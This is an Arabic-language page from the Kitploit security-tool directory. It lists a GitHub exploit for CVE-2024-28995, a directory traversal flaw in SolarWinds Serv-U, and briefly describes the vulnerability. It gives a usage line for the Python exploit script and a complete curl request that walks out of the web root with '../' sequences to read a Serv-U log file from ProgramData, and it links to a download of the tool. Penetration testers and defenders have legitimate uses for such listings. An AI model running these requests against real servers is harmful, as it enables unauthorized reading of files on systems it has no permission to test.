Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-28995 — استغلال لـ CVE-2024-28995 | Kitploit
أدوات/GitHubGitHub/0xc4t/cve-2024-28995
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHub0xc4t/cve-2024-28995

CVE-2024-28995

استغلال لـ CVE-2024-28995

عرض المستودع
21منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

استغلال لـ CVE-2024-28995

في 5 يونيو 2024، نشرت SolarWinds إشعارًا لـ CVE-2024-28995، وهي ثغرة اجتياز الدليل عالية الخطورة تؤثر على حل نقل الملفات Serv-U. تم اكتشاف الثغرة بواسطة الباحث Hussein Daher من Web Immunify.

استخدام الاستغلال

root@kitploit:~
python3 CVE-2024-28995.py -t http://example.com/ -f somefile

استخدام Curl

root@kitploit:~
curl -i -k --path-as-is "http://<target>/?InternalDir=/../../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U-StartupLog.txt"

المراجع:

  • https://attackerkb.com/topics/2k7UrkHyl3/cve-2024-28995/rapid7-analysis
  • https://nvd.nist.gov/vuln/detail/CVE-2024-28995
تنزيل الأداة